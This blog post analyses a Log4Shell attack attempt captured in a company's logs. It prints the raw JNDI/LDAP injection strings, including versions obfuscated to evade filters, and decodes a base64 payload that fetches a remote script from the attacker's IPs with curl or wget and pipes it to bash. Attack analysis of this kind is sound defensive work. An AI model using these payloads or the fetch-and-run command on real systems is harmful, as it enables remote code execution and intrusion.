Log4j shell attack. Let’s analyze one attack we received
No one thing about security, until they get hit by a cyber atta
Disclaimer
We are safe, everything was patched the day the vulnerability was announced.
Background
I work for a luxury company and we use Datadog for logging, tracing, infrastructure and monitoring.
I searched just for curiosity and found a few attacks, from which 1 was very interesting.
Please don’t run any commands on your computer. Use a `VM` or `container` instead
I use gitpod.io, which is a container ubuntu instance that has no access to any of my private data. I don’t even use a VM on GCP is 2 dangerous.
So what the attack looks like
Is just an endpoint that will resolve thanks to log4j.
This is the log I got from Datadog
It has so many levels of complexity
To me it looks like a guy who really knows what is doing.
We can see 3 strings.
- ${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMzEuMjA1LjY5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzM0LjIzMS4yMDUuNjk6ODApfGJhc2g=}
- ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMzEuMjA1LjY5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzM0LjIzMS4yMDUuNjk6ODApfGJhc2g=}
- ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMzEuMjA1LjY5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzM0LjIzMS4yMDUuNjk6ODApfGJhc2g=}
So he sent 3 commands, just in case 1 failed because we were string filtering against it.
${lower:l}${lower:d}${lower:a}${lower:p}
makes sure that fi we are filtering by ldap
we won’t be able to catch it, but the log4j will resolve it into ldap
the same trick he used also for the jndi
word
If we take the IP and search for its location we find that is from Russia
I just searched on Google for iplocation
and the first site that it came out is this one
So basically our hacker tried has a server in Russia and is trying to make our service call his server on port 12344
I don’t see any special case that he is using this port. If you see any, please let me know in the comments
Let’s see the params that he is using.
/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMzEuMjA1LjY5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzM0LjIzMS4yMDUuNjk6ODApfGJhc2g=
The first 3 commands don’t look very interesting, except that he may be using this server for other kinds of attacks, and that is very precise and organized. Maybe he was not a blackhat but more as a developer that was trying to see if he can hack us with this easy-to-use log4j bug.
But the base64
string is very interesting, let’s decode it with an online decoder like https://www.base64decode.org/
Now, this is interesting!
Dam, so he hid a bash code into a base64. I’ve been a developer for 10 years and did not know that a base64 code can resolve into a bash script.
The bash script is doing curl
call to a server 195.54.160.149
on port 5874
So the IP again from Russia on a port that has nothing special.
In case you were asking what the IP after the port is about, well my dear reader, this is a great question with a very simple answer
the IP 195.54.160.149
is a proxy, to 34.231.205.69
So the real server is 34.231.205.69
, let’s see the location
Surprise Surprise, this is a USA IP. Someone pretended to be someone else.
This is very interesting but I won’t comment.
Another thing about the bash script is that it firstcurl 195.54.160.149:5874
then if the curl does not return an error it executes the wget
, the magic part here is the or operator||
Also, another thing to notice is the -s
(silent) option that will create no logs, very smart.
If the curl does not return an error, then the script uses the wget to download a file wget -q -O- 195.54.160.149:5874/34.231.205.69:80
and pass the entire script to bash
using the pipe |
so it gets executed without leaving any tracks.
(curl -s 195.54.160.149:5874/34.231.205.69:80||wget -q -O- 195.54.160.149:5874/34.231.205.69:80)|bash
Smart, very smart.
Let’s see what this command downloads
I will open a Gitpod instance, modify the script to download the bash script
instead of executing it
(curl -s 195.54.160.149:5874/34.231.205.69:80||wget -q -O- 195.54.160.149:5874/34.231.205.69:80) > bad-actor-script.txt
So it looks like it does not return anything. Empty string.
I guess that he removed the script from the response and put it back only when he is doing the attacks.
My thoughts
I think there were other levels into this attack but he removed the script from the response.
I think the USA IP is just a free amazon account that he (or she ) uses as a proxy.
I think is a very skilled person, who has done many attacks, has a lot of experience, and knows how to cover the tracks.
I, to some extent, like him. Great job!
What do you think about this attack?
let me know in the comments.
Also, let me know if you want to see other attacks that we received.
Thank you for reading and as always,
If you enjoyed please leave a few claps 👏👏👏
As it helps me a lot.
Have a lovely day.